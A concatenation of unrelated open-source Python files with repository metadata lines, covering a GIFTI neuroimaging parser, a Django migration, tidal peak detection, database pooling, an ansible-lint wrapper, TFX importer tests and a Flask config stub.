from tvb.basic.logger.builder import get_logger
from tvb.core.adapters.exceptions import ParseException
from tvb.datatypes.surfaces import CorticalSurface, center_vertices, make_surface
from tvb.datatypes.time_series import TimeSeriesSurface
OPTION_READ_METADATA = "ReadFromMetaData"
class GIFTIParser(object):
"""
This class reads content of a GIFTI file and builds / returns a Surface instance
filled with details.
"""
UNIQUE_ID_ATTR = "UniqueID"
SUBJECT_ATTR = "SubjectID"
ASP_ATTR = "AnatomicalStructurePrimary"
DATE_ATTR = "Date"
DESCRIPTION_ATTR = "Description"
NAME_ATTR = "Name"
TIME_STEP_ATTR = "TimeStep"
def __init__(self, storage_path, operation_id):
self.logger = get_logger(__name__)
self.storage_path = storage_path
self.operation_id = operation_id
@staticmethod
def _get_meta_dict(data_array):
data_array_meta = data_array.meta
if data_array_meta is None or data_array_meta.data is None:
return {}
return dict((meta_pair.name, meta_pair.value) for meta_pair in data_array_meta.data)
@staticmethod
def _is_surface_gifti(data_arrays):
return (len(data_arrays) == 2
and intent_codes.code["NIFTI_INTENT_POINTSET"] == data_arrays[0].intent
and data_type_codes.code["NIFTI_TYPE_FLOAT32"] == data_arrays[0].datatype
and intent_codes.code["NIFTI_INTENT_TRIANGLE"] == data_arrays[1].intent
and data_type_codes.code["NIFTI_TYPE_INT32"] == data_arrays[1].datatype)
@staticmethod
def _is_timeseries_gifti(data_arrays):
return (len(data_arrays) > 1
and intent_codes.code["NIFTI_INTENT_TIME_SERIES"] == data_arrays[0].intent
and data_type_codes.code["NIFTI_TYPE_FLOAT32"] == data_arrays[0].datatype)
def _parse_surface(self, data_arrays, data_arrays_part2, surface_type, should_center):
meta_dict = self._get_meta_dict(data_arrays[0])
anatomical_structure_primary = meta_dict.get(self.ASP_ATTR)
gid = meta_dict.get(self.UNIQUE_ID_ATTR)
subject = meta_dict.get(self.SUBJECT_ATTR)
title = meta_dict.get(self.NAME_ATTR)
# Now try to determine what type of surface we have
# If a surface type is not explicitly given we use the type specified in the metadata
if surface_type == OPTION_READ_METADATA:
surface_type = anatomical_structure_primary
if surface_type is None:
raise ParseException("Please specify the type of the surface")
surface = make_surface(surface_type)
if surface is None:
raise ParseException("Could not determine surface type! %s" % surface_type)
# Now fill TVB data type with metadata
if gid is not None:
gid = gid.replace("{", "").replace("}", "")
surface.gid = gid
if subject is not None:
surface.subject = subject
if title is not None:
surface.title = title
surface.storage_path = self.storage_path
surface.set_operation_id(self.operation_id)
surface.zero_based_triangles = True
# Now fill TVB data type with geometry data
vertices = data_arrays[0].data
triangles = data_arrays[1].data
vertices_in_lh = len(vertices)
# If a second file is present append that data
if data_arrays_part2 is not None:
# offset the indices
offset = len(vertices)
vertices = np.vstack([vertices, data_arrays_part2[0].data])
triangles = np.vstack([triangles, offset + data_arrays_part2[1].data])
if should_center:
vertices = center_vertices(vertices)
# set hemisphere mask if cortex
if isinstance(surface, CorticalSurface):
# if there was a 2nd file then len(vertices) != vertices_in_lh
surface.hemisphere_mask = np.zeros(len(vertices), dtype=np.bool)
surface.hemisphere_mask[vertices_in_lh:] = 1
surface.vertices = vertices
surface.triangles = triangles
return surface
def _parse_timeseries(self, data_arrays):
# Create TVB time series to be filled
time_series = TimeSeriesSurface()
time_series.storage_path = self.storage_path
time_series.set_operation_id(self.operation_id)
time_series.start_time = 0.0
time_series.sample_period = 1.0
# First process first data_array and extract important data from it's metadata
meta_dict = self._get_meta_dict(data_arrays[0])
gid = meta_dict.get(self.UNIQUE_ID_ATTR)
sample_period = meta_dict.get(self.TIME_STEP_ATTR)
time_series.subject = meta_dict.get(self.SUBJECT_ATTR)
time_series.title = meta_dict.get(self.NAME_ATTR)
if gid:
time_series.gid = gid.replace("{", "").replace("}", "")
if sample_period:
time_series.sample_period = float(sample_period)
# todo : make sure that write_time_slice is not required here
# Now read time series data
for data_array in data_arrays:
time_series.write_data_slice([data_array.data])
# Close file after writing data
time_series.close_file()
return time_series
def parse(self, data_file, data_file_part2=None, surface_type=OPTION_READ_METADATA, should_center=False):
"""
Parse NIFTI file(s) and returns A Surface or a TimeSeries for it.
:param surface_type: one of "Cortex" "Head" "ReadFromMetaData"
:param data_file_part2: a file containing the second part of the surface
"""
self.logger.debug("Start to parse GIFTI file: %s" % data_file)
if data_file is None:
raise ParseException("Please select GIFTI file which contains data to import")
if not os.path.exists(data_file):
raise ParseException("Provided file %s does not exists" % data_file)
if data_file_part2 is not None and not os.path.exists(data_file_part2):
raise ParseException("Provided file part %s does not exists" % data_file_part2)
try:
gifti_image = giftiio.read(data_file)
data_arrays = gifti_image.darrays
self.logger.debug("File parsed successfully")
if data_file_part2 is not None:
data_arrays_part2 = giftiio.read(data_file_part2).darrays
else:
data_arrays_part2 = None
except Exception, excep:
self.logger.exception(excep)
msg = "File: %s does not have a valid GIFTI format." % data_file
raise ParseException(msg)
self.logger.debug("Determine data type stored in GIFTI file")
# First check if it's a surface
if self._is_surface_gifti(data_arrays):
# If a second part exists is must be of the same type
if data_arrays_part2 is not None and not self._is_surface_gifti(data_arrays_part2):
raise ParseException("Second file must be a surface too")
return self._parse_surface(data_arrays, data_arrays_part2, surface_type, should_center)
elif self._is_timeseries_gifti(data_arrays):
return self._parse_timeseries(data_arrays)
else:
raise ParseException("Could not map data from GIFTI file to a TVB data type") | gpl-2.0 | 4,596,486,521,529,889,300 | 40.479452 | 109 | 0.654519 | false |
jarifibrahim/ashoka-dashboard | dashboard/migrations/0012_auto_20161210_1033.py | 1 | 3097 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-10 05:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0011_auto_20161209_2249'),
]
operations = [
migrations.AddField(
model_name='email',
name='active',
field=models.BooleanField(default=False, help_text='If this field is set to ON all the emails of the specified type will use this template. Each type of email can have only one default', verbose_name='Use this as default template of its type?'),
),
migrations.AddField(
model_name='email',
name='name',
field=models.CharField(default='A', help_text='Template name to uniquely identify it.', max_length=200, verbose_name='Name of the Template'),
preserve_default=False,
),
migrations.AlterField(
model_name='email',
name='message',
field=models.TextField(help_text="If you wish to include the url to consultant form in the email, please add 'FORM_URL' (without quotes) placeholder. It will be replaced by the actual consultant url in the email.", verbose_name='Body of the Email'),
),
migrations.AlterField(
model_name='email',
name='type',
field=models.CharField(choices=[('IM', 'Instruction Mail'), ('RM', 'Reminder Mail')], help_text='Type of the template. Currently Instruction Email template and Reminder Email template are supported.', max_length=5, verbose_name='Type of Email'),
),
migrations.AlterField(
model_name='teamstatus',
name='automatic_reminder',
field=models.BooleanField(default=True, help_text='Should periodic Automatic Reminders Emails be sent?', verbose_name='Send Automatic Reminders?'),
),
migrations.AlterField(
model_name='teamstatus',
name='call_change_count',
field=models.IntegerField(default=0, help_text='This value will be added to total calls count.', verbose_name='Add/Subtract Total Calls count'),
),
migrations.AlterField(
model_name='teamstatus',
name='kick_off',
field=models.CharField(choices=[('NS', 'Not Started'), ('IMS', 'Intro Mail Sent'), ('DA', 'Date Arranged'), ('CH', 'Call Happened')], default='NS', max_length=5, verbose_name='Kick Off Status'),
),
migrations.AlterField(
model_name='teamstatus',
name='last_automatic_reminder',
field=models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Last automatic reminder sent on'),
),
migrations.AlterField(
model_name='teamstatus',
name='mid_term',
field=models.CharField(choices=[('NS', 'Not Started'), ('IMS', 'Intro Mail Sent'), ('DA', 'Date Arranged'), ('CH', 'Call Happened')], default='NS', max_length=5, verbose_name='Mid Term Status'),
),
]
| apache-2.0 | 2,860,983,926,016,569,000 | 49.770492 | 261 | 0.619309 | false |
cdd1969/pygwa | lib/flowchart/nodes/n08_detectpeaks_v2/node_detectpeaks_v2.py | 1 | 11749 | #!/usr/bin python
# -*- coding: utf-8 -*-
from pyqtgraph import BusyCursor
from pyqtgraph.Qt import QtGui
import numpy as np
from lib.flowchart.nodes.generalNode import NodeWithCtrlWidget, NodeCtrlWidget
from lib.functions.general import isNumpyDatetime, isNumpyNumeric
from lib.functions.detectpeaks import full_peak_detection_routine, prepare_order, prepare_datetime
class detectPeaksTSNode_v2(NodeWithCtrlWidget):
"""Detect peaks (minima/maxima) from passed TimeSeries, check period"""
nodeName = "Detect Peaks (v2)"
uiTemplate = [
{'title': 'data', 'name': 'column', 'type': 'list', 'value': None, 'default': None, 'values': [None], 'tip': 'Column name with hydrograph data'},
{'name': 'datetime', 'type': 'list', 'value': None, 'default': None, 'values': [None], 'tip': 'Location of the datetime objects.'},
{'name': 'Peak Detection Params', 'type': 'group', 'children': [
{'name': 'T', 'type': 'float', 'value': 12.42, 'default': 12.42, 'suffix': ' hours', 'tip': 'Awaited period of the signal in hours.'},
{'title': 'dt', 'name': 'hMargin', 'type': 'float', 'value': 1.5, 'default': 1.5, 'limits': (0., 100.), 'suffix': ' hours', 'tip': 'Number of hours, safety margin when comparing period length.\nSee formula below:\nT/2 - dt < T_i/2 < T/2 + dt'},
{'name': 'order', 'type': 'str', 'value': '?', 'readonly': True, 'tip': 'How many points on each side to use for the comparison'},
{'name': 'mode', 'type': 'list', 'values': ['clip', 'wrap'], 'value': 'clip', 'default': 'clip', 'tip': 'How the edges of the vector are treated. ‘wrap’ (wrap around)\nor ‘clip’ (treat overflow as the same as the last (or first) element)'},
{'name': 'removeRegions', 'type': 'bool', 'value': True, 'readonly': True, 'default': True, 'visible': False, 'tip': "remove possible multiple peaks that go one-by-one"}
]},
{'title': 'Ignore peaks', 'name': 'ignore', 'type': 'bool', 'value': False, 'default': False, 'tip': 'Checkbox to ignore peaks that are mentioned in parameter `Peak IDs', 'children': [
{'title': 'Peak IDs', 'name': 'peaks2ignore', 'type': 'str', 'value': '', 'default': '', 'tip': 'IDs of the peaks that will be ignored. IDs can be found in table in terminal `raw`. \nInteger or a comma-separated integer list.\n Example:\n12\n0, 12, 1153'},
]},
{'title': 'Plausibility Check Params', 'name': 'check_grp', 'type': 'group', 'children': [
{'title': 'Neighbour MIN peaks', 'name': 'MIN_grp', 'type': 'group', 'children': [
{'title': 'Valid Period\n(lower border)', 'name': 'range1', 'type': 'float', 'value': 10.0, 'default': 10., 'suffix': ' hours', 'tip': 'Lower border of the valid time-distance between two neigbour MIN peaks'},
{'title': 'Valid Period\n(upper border)', 'name': 'range2', 'type': 'float', 'value': 15.0, 'default': 15., 'suffix': ' hours', 'tip': 'Upper border of the valid time-distance between two neigbour MIN peaks'},
{'title': 'Warnings (MIN)', 'name': 'warn', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True}
]},
{'title': 'Neighbour MAX peaks', 'name': 'MAX_grp', 'type': 'group', 'children': [
{'title': 'Valid Period\n(lower border)', 'name': 'range1', 'type': 'float', 'value': 10.0, 'default': 10., 'suffix': ' hours', 'tip': 'Lower border of the valid time-distance between two neigbour MAX peaks'},
{'title': 'Valid Period\n(upper border)', 'name': 'range2', 'type': 'float', 'value': 15.0, 'default': 15., 'suffix': ' hours', 'tip': 'Upper border of the valid time-distance between two neigbour MAX peaks'},
{'title': 'Warnings (MAX)', 'name': 'warn', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True}
]},
{'title': 'Neighbour ALL peaks', 'name': 'ALL_grp', 'type': 'group', 'children': [
{'title': 'Valid Period\n(lower border)', 'name': 'range1', 'type': 'float', 'value': 4.0, 'default': 4., 'suffix': ' hours', 'tip': 'Lower border of the valid time-distance between two neigbour peaks (MIN or MAX)'},
{'title': 'Valid Period\n(upper border)', 'name': 'range2', 'type': 'float', 'value': 9.0, 'default': 9., 'suffix': ' hours', 'tip': 'Upper border of the valid time-distance between two neigbour peaks (MIN or MAX)'},
{'title': 'Warnings (ALL)', 'name': 'warn', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True}
]},
{ 'title': 'Warnings (Total)', 'name': 'warn_sum', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True},
]},
{'title': 'Output', 'name': 'out_grp', 'type': 'group', 'children': [
{ 'title': 'Raw Minimums', 'name': 'raw_nmin', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True},
{ 'title': 'Raw Maximums', 'name': 'raw_nmax', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True},
{ 'title': 'Raw Number\nof Mins+Maxs', 'name': 'raw_n_all', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True},
{ 'title': 'Final Number\nof Cycles', 'name': 'n_cycles', 'type': 'str', 'value': '?', 'default': '?', 'readonly': True}
]},
{'name': 'Plot', 'type': 'action'}]
def __init__(self, name, parent=None):
super(detectPeaksTSNode_v2, self).__init__(name, parent=parent, terminals={'In': {'io': 'in'}, 'raw': {'io': 'out'}, 'peaks': {'io': 'out'}}, color=(250, 250, 150, 150))
self._plotRequired = False
def _createCtrlWidget(self, **kwargs):
return detectPeaksTSNode_v2CtrlWidget(**kwargs)
def process(self, In):
df = In
self.CW().param('check_grp', 'MIN_grp', 'warn').setValue('?')
self.CW().param('check_grp', 'MAX_grp', 'warn').setValue('?')
self.CW().param('check_grp', 'ALL_grp', 'warn').setValue('?')
self.CW().param('check_grp', 'warn_sum').setValue('?')
self.CW().param('out_grp', 'raw_nmin').setValue('?')
self.CW().param('out_grp', 'raw_nmax').setValue('?')
self.CW().param('out_grp', 'raw_n_all').setValue('?')
self.CW().param('out_grp', 'n_cycles').setValue('?')
self.CW().param('Peak Detection Params', 'order').setValue('?')
if df is None:
return {'raw': None, 'peaks': None}
colname = [col for col in df.columns if isNumpyNumeric(df[col].dtype)]
self.CW().param('column').setLimits(colname)
colname = [col for col in df.columns if isNumpyDatetime(df[col].dtype)]
self.CW().param('datetime').setLimits(colname)
kwargs = self.CW().prepareInputArguments()
kwargs['split'] = True
with BusyCursor():
kwargs['order'] = prepare_order(kwargs['T'], kwargs['hMargin'], prepare_datetime(df, datetime=kwargs['datetime']))
self.CW().param('Peak Detection Params', 'order').setValue(str(kwargs['order']))
#peaks = detectPeaks_ts(df, kwargs.pop('column'), plot=self._plotRequired, **kwargs)
extra, raw, peaks = full_peak_detection_routine(df, col=kwargs.pop('column'), date_col=kwargs.pop('datetime'),
IDs2mask=kwargs.pop('IDs2mask'), valid_range=kwargs.pop('valid_range'),
plot=self._plotRequired,
**kwargs)
n_warn_min = len(extra['warnings']['MIN'])
n_warn_max = len(extra['warnings']['MAX'])
n_warn_all = len(extra['warnings']['ALL'])
self.CW().param('check_grp', 'MIN_grp', 'warn').setValue(n_warn_min)
self.CW().param('check_grp', 'MAX_grp', 'warn').setValue(n_warn_max)
self.CW().param('check_grp', 'ALL_grp', 'warn').setValue(n_warn_all)
self.CW().param('check_grp', 'warn_sum').setValue(n_warn_min + n_warn_max + n_warn_all)
self.CW().param('out_grp', 'raw_nmin').setValue(extra['raw_nmin'])
self.CW().param('out_grp', 'raw_nmax').setValue(extra['raw_nmax'])
if raw is not None: self.CW().param('out_grp', 'raw_n_all').setValue(len(raw.index))
if peaks is not None: self.CW().param('out_grp', 'n_cycles').setValue(len(peaks.index))
return {'raw': raw, 'peaks': peaks}
def plot(self):
self._plotRequired = True
self._plotRequired = self.check_n_warnings()
self.update()
self._plotRequired = False
def check_n_warnings(self):
n = self.CW().param('check_grp', 'warn_sum').value()
if n == '?':
return True
if int(n) > 100:
reply = QtGui.QMessageBox.question(None, 'Too many Warnings!',
"You are going to plot {0} peak-warnings!\nThis will be slow and not informative!\n\nDo you really want to create the plot?".format(n),
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.No:
return False
elif reply == QtGui.QMessageBox.Yes:
return True
else:
return True
class detectPeaksTSNode_v2CtrlWidget(NodeCtrlWidget):
def __init__(self, **kwargs):
super(detectPeaksTSNode_v2CtrlWidget, self).__init__(update_on_statechange=True, **kwargs)
self.disconnect_valueChanged2upd(self.param('Peak Detection Params', 'order'))
self.disconnect_valueChanged2upd(self.param('check_grp', 'MIN_grp', 'warn'))
self.disconnect_valueChanged2upd(self.param('check_grp', 'MAX_grp', 'warn'))
self.disconnect_valueChanged2upd(self.param('check_grp', 'ALL_grp', 'warn'))
self.disconnect_valueChanged2upd(self.param('check_grp', 'warn_sum'))
self.disconnect_valueChanged2upd(self.param('out_grp', 'raw_nmin'))
self.disconnect_valueChanged2upd(self.param('out_grp', 'raw_nmax'))
self.disconnect_valueChanged2upd(self.param('out_grp', 'n_cycles'))
self.disconnect_valueChanged2upd(self.param('out_grp', 'raw_n_all'))
self.param('Plot').sigActivated.connect(self._parent.plot)
def prepareInputArguments(self):
kwargs = dict()
kwargs['column'] = self.param('column').value()
kwargs['datetime'] = self.param('datetime').value()
kwargs['T'] = self.param('Peak Detection Params', 'T').value()
kwargs['hMargin'] = self.param('Peak Detection Params', 'hMargin').value()
kwargs['mode'] = self.param('Peak Detection Params', 'mode').value()
kwargs['IDs2mask'] = [int(val) for val in self.param('ignore', 'peaks2ignore').value().split(',')] if (self.param('ignore').value() is True and self.param('ignore', 'peaks2ignore').value() != '') else []
kwargs['removeRegions'] = self.param('Peak Detection Params', 'removeRegions').value()
kwargs['valid_range'] = {
'MIN': [np.timedelta64(int(self.param('check_grp', 'MIN_grp', 'range1').value()*3600), 's'),
np.timedelta64(int(self.param('check_grp', 'MIN_grp', 'range2').value()*3600), 's')],
'MAX': [np.timedelta64(int(self.param('check_grp', 'MAX_grp', 'range1').value()*3600), 's'),
np.timedelta64(int(self.param('check_grp', 'MAX_grp', 'range2').value()*3600), 's')],
'ALL': [np.timedelta64(int(self.param('check_grp', 'ALL_grp', 'range1').value()*3600), 's'),
np.timedelta64(int(self.param('check_grp', 'ALL_grp', 'range2').value()*3600), 's')]
}
return kwargs
| gpl-2.0 | -2,258,799,015,408,088,600 | 68.064706 | 268 | 0.570224 | false |
pulsar-chem/Pulsar-Core | lib/systems/l-leucine.py | 1 | 1231 | import pulsar as psr
def load_ref_system():
""" Returns l-leucine as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
H 0.3678 -1.3008 0.4056
C 0.5471 -0.3960 -0.2429
N 2.0124 -0.1721 -0.2619
H 2.3296 -0.0107 0.6710
H 2.2351 0.6192 -0.8294
C -0.2810 0.7693 0.3217
H 0.0653 1.7342 -0.1027
H -1.3362 0.6643 -0.0026
C -0.2335 0.8255 1.8505
H 0.8348 0.8722 2.1782
C -0.8684 -0.4159 2.4566
H -0.7192 -0.4539 3.5427
H -0.4280 -1.3286 2.0209
H -1.9499 -0.4521 2.2695
C -0.9374 2.0778 2.3462
H -0.9140 2.1367 3.4421
H -1.9919 2.0983 2.0389
H -0.4635 2.9879 1.9557
C 0.0963 -0.6776 -1.6698
O 0.2328 0.0062 -2.6676
O -0.5612 -1.8476 -1.8380
H -0.7998 -1.9596 -2.7530
""")
| bsd-3-clause | -8,902,193,450,787,371,000 | 41.448276 | 65 | 0.39805 | false |
lfblogs/aio2py | aio2py/db/pool.py | 1 | 1541 | # -*- coding: UTF-8 -*-
__author__ = "Liu Fei"
__github__ = "http://github.com/lfblogs"
__all__ = [
"Pool"
]
"""
Define database connection pool
"""
import asyncio
import logging
try:
import aiomysql
except ImportError:
from aio2py.required import aiomysql
try:
import aiopg
except ImportError:
from aio2py.required import aiopg
logging.basicConfig(level=logging.INFO)
@asyncio.coroutine
def Pool(loop,**kw):
logging.info('Create database connection pool...')
global __pool
ENGINE = kw.get('ENGINE',None)
if not ENGINE:
raise KeyError('Not found database ENGINE in conf files...')
if ENGINE == 'mysql':
__pool = yield from aiomysql.create_pool(
host = kw.get('host', ''),
port = kw.get('port', 3306),
user = kw.get('user', ''),
password = kw.get('password', ''),
db = kw.get('db', ''),
charset = kw.get('charset', 'utf8'),
autocommit = kw.get('autocommit', True),
maxsize = kw.get('maxsize', 10),
minsize = kw.get('minsize', 1),
loop = loop
)
elif ENGINE == 'postgresql':
__pool = yield from aiopg.pool.create_pool(
host = kw.get('host', ''),
port = kw.get('port', 5432),
user = kw.get('user', ''),
password = kw.get('password', ''),
database = kw.get('db', ''),
maxsize = kw.get('maxsize', 10),
minsize = kw.get('minsize', 1),
loop = loop
)
else:
raise KeyError('Database ENGINE Error...') | apache-2.0 | 8,201,426,354,376,966,000 | 23.09375 | 68 | 0.55743 | false |
lpenz/omnilint | container/omnilint/checkers/ansibleplaybooks.py | 1 | 1902 | # Copyright (C) 2020 Leandro Lisboa Penz <[email protected]>
# This file is subject to the terms and conditions defined in
# file 'LICENSE', which is part of this source code package.
'''ansible playbook checker'''
import yaml
import subprocess
import re
from omnilint.error import Error
from omnilint.checkers import Checker
class AnsiblePlaybook(Checker):
extensions = ['yaml', 'yml']
def __init__(self):
super(AnsiblePlaybook, self).__init__()
def isplaybook(self, data):
if not isinstance(data, list):
return False
for e in data:
if not isinstance(e, dict):
return False
if 'import_playbook' in e:
return True
if 'hosts' in e:
return True
return False
def check(self, reporter, origname, tmpname, firstline, fd):
try:
data = yaml.load(fd)
except yaml.YAMLError:
# This is reported by the yaml checker:
return
if not self.isplaybook(data):
return
with subprocess.Popen(
['/usr/local/bin/ansible-lint', '-p', '--nocolor', tmpname],
stdout=subprocess.PIPE,
env={'HOME': '/tmp'}) as p:
regex = re.compile(''.join([
'^(?P<path>[^:]+)', ':(?P<line>[0-9]+)', ': (?P<message>.*)$'
]))
for line in p.stdout:
line = line.decode('utf-8').rstrip()
m = regex.match(line)
assert m
reporter.report(
Error(msg=m.group('message'),
file=m.group('path'),
line=int(m.group('line'))))
def register(omnilint):
'''Registration function, called by omnilint while loading the checker with
itself as argument'''
omnilint.register(AnsiblePlaybook)
| mit | -1,433,899,188,108,483,600 | 29.677419 | 79 | 0.538381 | false |
tensorflow/tfx | tfx/dsl/components/common/importer_test.py | 1 | 6142 | # Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.dsl.components.common.importer."""
import tensorflow as tf
from tfx import types
from tfx.dsl.components.common import importer
from tfx.orchestration import data_types
from tfx.orchestration import metadata
from tfx.types import artifact_utils
from tfx.types import standard_artifacts
from tfx.utils import json_utils
from ml_metadata.proto import metadata_store_pb2
class ImporterTest(tf.test.TestCase):
def testImporterDefinitionWithSingleUri(self):
impt = importer.Importer(
source_uri='m/y/u/r/i',
properties={
'split_names': '["train", "eval"]',
},
custom_properties={
'str_custom_property': 'abc',
'int_custom_property': 123,
},
artifact_type=standard_artifacts.Examples).with_id('my_importer')
self.assertDictEqual(
impt.exec_properties, {
importer.SOURCE_URI_KEY: 'm/y/u/r/i',
importer.REIMPORT_OPTION_KEY: 0,
})
self.assertEmpty(impt.inputs)
output_channel = impt.outputs[importer.IMPORT_RESULT_KEY]
self.assertEqual(output_channel.type, standard_artifacts.Examples)
# Tests properties in channel.
self.assertEqual(output_channel.additional_properties, {
'split_names': '["train", "eval"]',
})
self.assertEqual(output_channel.additional_custom_properties, {
'str_custom_property': 'abc',
'int_custom_property': 123,
})
# Tests properties in artifact.
output_artifact = list(output_channel.get())[0]
self.assertEqual(output_artifact.split_names, '["train", "eval"]')
self.assertEqual(
output_artifact.get_string_custom_property('str_custom_property'),
'abc')
self.assertEqual(
output_artifact.get_int_custom_property('int_custom_property'), 123)
def testImporterDumpsJsonRoundtrip(self):
component_id = 'my_importer'
source_uris = ['m/y/u/r/i']
impt = importer.Importer(
source_uri=source_uris,
artifact_type=standard_artifacts.Examples).with_id(component_id)
# The following line will raise an assertion if object not JSONable.
json_text = json_utils.dumps(impt)
actual_obj = json_utils.loads(json_text)
self.assertEqual(actual_obj.id, component_id)
self.assertEqual(actual_obj._source_uri, source_uris)
class ImporterDriverTest(tf.test.TestCase):
def setUp(self):
super().setUp()
self.connection_config = metadata_store_pb2.ConnectionConfig()
self.connection_config.sqlite.SetInParent()
self.properties = {
'split_names': artifact_utils.encode_split_names(['train', 'eval'])
}
self.custom_properties = {
'string_custom_property': 'abc',
'int_custom_property': 123,
}
self.output_dict = {
importer.IMPORT_RESULT_KEY:
types.Channel(
type=standard_artifacts.Examples,
additional_properties=self.properties,
additional_custom_properties=self.custom_properties)
}
self.source_uri = 'm/y/u/r/i'
self.existing_artifacts = []
existing_artifact = standard_artifacts.Examples()
existing_artifact.uri = self.source_uri
existing_artifact.split_names = self.properties['split_names']
self.existing_artifacts.append(existing_artifact)
self.pipeline_info = data_types.PipelineInfo(
pipeline_name='p_name', pipeline_root='p_root', run_id='run_id')
self.component_info = data_types.ComponentInfo(
component_type='c_type',
component_id='c_id',
pipeline_info=self.pipeline_info)
self.driver_args = data_types.DriverArgs(enable_cache=True)
def _callImporterDriver(self, reimport: bool):
with metadata.Metadata(connection_config=self.connection_config) as m:
m.publish_artifacts(self.existing_artifacts)
driver = importer.ImporterDriver(metadata_handler=m)
execution_result = driver.pre_execution(
component_info=self.component_info,
pipeline_info=self.pipeline_info,
driver_args=self.driver_args,
input_dict={},
output_dict=self.output_dict,
exec_properties={
importer.SOURCE_URI_KEY: self.source_uri,
importer.REIMPORT_OPTION_KEY: int(reimport),
})
self.assertFalse(execution_result.use_cached_results)
self.assertEmpty(execution_result.input_dict)
self.assertEqual(
1, len(execution_result.output_dict[importer.IMPORT_RESULT_KEY]))
self.assertEqual(
execution_result.output_dict[importer.IMPORT_RESULT_KEY][0].uri,
self.source_uri)
self.assertNotEmpty(self.output_dict[importer.IMPORT_RESULT_KEY].get())
results = self.output_dict[importer.IMPORT_RESULT_KEY].get()
self.assertEqual(1, len(results))
result = results[0]
self.assertEqual(result.uri, result.uri)
for key, value in self.properties.items():
self.assertEqual(value, getattr(result, key))
for key, value in self.custom_properties.items():
if isinstance(value, int):
self.assertEqual(value, result.get_int_custom_property(key))
elif isinstance(value, (str, bytes)):
self.assertEqual(value, result.get_string_custom_property(key))
else:
raise ValueError('Invalid custom property value: %r.' % value)
def testImportArtifact(self):
self._callImporterDriver(reimport=True)
def testReuseArtifact(self):
self._callImporterDriver(reimport=False)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 6,663,077,504,231,607,000 | 36.680982 | 77 | 0.676327 | false |
LCAV/pyroomacoustics | pyroomacoustics/denoise/__init__.py | 1 | 1165 | """
Single Channel Noise Reduction
==============================
Collection of single channel noise reduction (SCNR) algorithms for speech:
- :doc:`Spectral Subtraction <pyroomacoustics.denoise.spectral_subtraction>` [1]_
- :doc:`Subspace Approach <pyroomacoustics.denoise.subspace>` [2]_
- :doc:`Iterative Wiener Filtering <pyroomacoustics.denoise.iterative_wiener>` [3]_
At `this repository <https://github.com/santi-pdp/segan>`_, a deep learning approach in Python can be found.
References
----------
.. [1] M. Berouti, R. Schwartz, and J. Makhoul, *Enhancement of speech corrupted by acoustic noise,*
ICASSP '79. IEEE International Conference on Acoustics, Speech, and Signal Processing, 1979, pp. 208-211.
.. [2] Y. Ephraim and H. L. Van Trees, *A signal subspace approach for speech enhancement,*
IEEE Transactions on Speech and Audio Processing, vol. 3, no. 4, pp. 251-266, Jul 1995.
.. [3] J. Lim and A. Oppenheim, *All-Pole Modeling of Degraded Speech,*
IEEE Transactions on Acoustics, Speech, and Signal Processing 26.3 (1978): 197-210.
"""
from .spectral_subtraction import *
from .subspace import *
from .iterative_wiener import *
| mit | -1,552,405,641,654,512,000 | 39.172414 | 109 | 0.712446 | false |
klpdotorg/dubdubdub | ekstepbin/ProcessUsage.py | 1 | 1985 | import os
import json
import time
import sys
DeviceList = sys.argv[1] #this takes device list as argument
TagList = sys.argv[2] #this takes Tag list as argument
dir = os.path.dirname(__file__)
json_file = os.path.join(dir, '../datapull/ekstepv3data/data/ME_SESSION_SUMMARY.json')
output_file = os.path.join(dir, '../datapull/usage.txt')
usage_file = open(output_file, 'w',encoding='utf-8')
with open (os.path.join(dir, '../datapull/'+DeviceList)) as f:
device_list = [line.rstrip() for line in f]
with open (os.path.join(dir, '../datapull/'+TagList)) as e:
tag_list = [line.rstrip() for line in e]
for line in open(json_file, 'r'):
valid_data = False
data = json.loads(line)
if 'app' in data["etags"]:
if len(data["etags"]["app"]) > 0:
if str(data["etags"]["app"][0]) in tag_list:
valid_data = True
if not valid_data:
if (str(data["dimensions"]["did"]) in device_list):
valid_data = True
if valid_data:
usage_file.write( data["mid"])
usage_file.write("|")
usage_file.write( data["uid"])
usage_file.write("|")
usage_file.write( data["dimensions"]["did"])
usage_file.write("|")
usage_file.write( str(data["edata"]["eks"]["timeSpent"]))
usage_file.write("|")
usage_file.write( str(data["dimensions"]["gdata"]["id"]))
usage_file.write("|")
s=int(data["context"]["date_range"]["from"])/1000.0
usage_file.write( time.strftime("%Y-%m-%dT%H:%M:%S",time.localtime(s)))
usage_file.write("|")
s=int(data["context"]["date_range"]["to"])/1000.0
usage_file.write( time.strftime("%Y-%m-%dT%H:%M:%S",time.localtime(s)))
usage_file.write("|")
s=int(data["syncts"])/1000.0
usage_file.write( time.strftime("%Y-%m-%dT%H:%M:%S",time.localtime(s)))
usage_file.write("\n")
usage_file.close()
| mit | 340,299,390,527,681,540 | 37.921569 | 86 | 0.565239 | false |
faylau/microblog | config.py | 1 | 1798 | #coding=utf-8
"""
该配置文件在__init__.py中读取
"""
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
"""
:summary:
"""
SCRF_ENABLED = True # 激活跨站点请求伪造保护
# SECRET_KEY配置仅仅当CSRF激活的时候才需要,建立一个加密的令牌用于验证表单。
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
